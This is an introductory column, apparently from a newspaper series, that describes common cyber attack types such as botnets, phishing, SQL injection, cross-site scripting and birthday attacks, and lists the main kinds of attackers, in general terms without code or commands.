Previously we introduced the subject by defining the term “cyber attack”.
We defined it as any action taken to harm a computer network for political, sabotage, protect against something for financial gain, and others.
The most reported cyber attacks are different; some are regarded as political, activism, sabotage, state-sponsored, and more.
Cyber attacks are not only associated with and initiated by military operations, but the civilians who know what they are doing are also launching cyber attacks.
With the increase of easy-to-use tools on the internet, anyone with a motive can launch a cyber attack.
We continue to look at the tools used to conduct a cyber-attack.
Botnets
Botnets are a network of systems infected with malware under a hacker’s control in order to carry out DDoS attacks.
These bots or zombie systems are used to carry out attacks against the target systems, often overwhelming the target systems bandwidth and processing capabilities.
These DDoS attacks are difficult to trace because botnets are located in differing geographic locations.
Man-in-the-Middle (MitM) Attack
A MitM attack occurs when a hacker inserts itself between the communications of a client and a server.
Here are some common types of man-in-the-middle attacks:
Session Hijacking
In this type of MitM attack, an attacker hijacks a session between a trusted client and a network server.
The attacking computer substitutes its IP address for the trusted client while the server continues the session, believing it is communicating with the client.
IP Spoofing
Internet Protocol (IP) spoofing is used by an attacker to convince a system that it is communicating with a known, trusted entity and provide the attacker with access to the system. The attacker sends a packet with the IP source address of a known, trusted host instead of its own IP source address to a target host.
The target host might accept the packet and act upon it.
Phishing and spear-phishing attacks
A phishing attack is a practice of sending emails that appear to be from trusted sources with the goal of gaining personal information or influencing users to do something.
It combines social engineering and technical trickery.
Spear phishing is a much targeted type of phishing activity.
Attackers take the time to conduct research into targets and create messages that are personal and relevant.
Because of this, spear phishing can be very hard to identify and even harder to defend against.
Drive-by download attack
Drive-by download attacks are a common method of spreading malware.
Hackers look for insecure websites and plant a malicious script into HTTP or PHP code on one of the pages.
This script might install malware directly onto the computer of someone who visits the site, or it might re-direct the victim to a site controlled by the hackers.
Drive-by downloads can happen when visiting a website or viewing an email message or a pop-up window.
Unlike many other types of cybersecurity attacks, a drive-by doesn’t rely on a user to do anything to actively enable the attack — you don’t have to click a download button or open a malicious email attachment to become infected.
A drive-by download can take advantage of an app, operating system or web browser that contains security flaws due to unsuccessful updates or lack updates.
Password attack
Because passwords are the most commonly used mechanism to authenticate users to an information system, obtaining passwords is a common and effective attack approach.
Access to a person’s password can be obtained by looking around the person’s desk, ‘‘sniffing’’ the connection to the network to acquire unencrypted passwords, using social engineering, gaining access to a password database or outright guessing.
The last approach can be done in either a random or systematic manner brute-force and dictionary attacks.
SQL injection attack
Structured Query Language (SQL) injection has become a common issue with database-driven websites.
It occurs when a malefactor executes a SQL query to the database via the input data from the client to server.
SQL commands are inserted into data-plane input (for example, instead of the login or password) in order to run predefined SQL commands.
A successful SQL injection exploit can read sensitive data from the database, modify (insert, update or delete) database data, execute administration operations (such as shutdown) on the database, recover the content of a given file, and, in some cases, issue commands to the operating system.
Cross-site scripting (XSS) attack
Cross-site scripting (XSS) attacks use third-party web resources to run scripts in the victim’s web browser or scriptable application.
Specifically, the attacker injects a payload with malicious JavaScript into a website’s database.
Eavesdropping attack
Eavesdropping attacks occur through the interception of network traffic.
By eavesdropping, an attacker can obtain passwords, credit card numbers and other confidential information that a user might be sending over the network.
Birthday attack
Birthday attacks are made against hash algorithms that are used to verify the integrity of a message, software or digital signature.
A uniquely characterized message processed by a hash function produces a Message Digest (MD) of fixed length, independent of the length of the input message.
The birthday attack refers to the probability of finding two random messages that generate the same MD when processed by a hash function.
If an attacker calculates same MD for his message as the user has, he can safely replace the user’s message with his, and the receiver will not be able to detect the replacement even if he compares MDs.
Malware attack
It can be described as unwanted software that is installed in your system without your consent. It can attach itself to legitimate code and propagate; it can lurk in useful applications or replicate itself across the Internet.
Here are some of the most common types of malware: macro viruses, file infectors, system or boot-record infectors, polymorphic viruses, stealth viruses trojans, logic bombs, worms, droppers, ransomware, adware and others.
Sources of cyber attack weapons
Actors who consciously decide to conduct cyber-attacks can potentially cause harm for any system which directly or indirectly is connected to the Internet.
1) Botnet Command Control Operators: Botnet central command uses a network, or zombies, of compromised, remotely controlled systems to connected attacks and to spread phishing schemes, spam, and malware attacks.
2) Organised Criminal Groups: Organised criminal teams get to attack systems for gain. They use sophisticated and advanced spam, phishing, and spyware or malware to commit identity theft and online fraud.
3) Hackers: Hackers break into networks for the thrill of the challenge, bragging rights in the hacker community, protest, and revenge, stalking others, and monetary gain, as well as other reasons.
4) Insiders: Insiders might access data either by curiosity or intention as a result of their knowledge of the target system typically permits them to realise unrestricted access, thereby causing damage to the system or stealing system data.
5) Nations Sponsored: Nations use cyber tools as a part of their information-gathering and undercover work activities.
The conclusion will be established in the next editions chapters three and four.
The author is a speaker, mentor, educator, trainer, professional and community leader, IT and cybersecurity leader. For comments email: ICTMatters@kingston.co.zm; www.kingston.co.zm.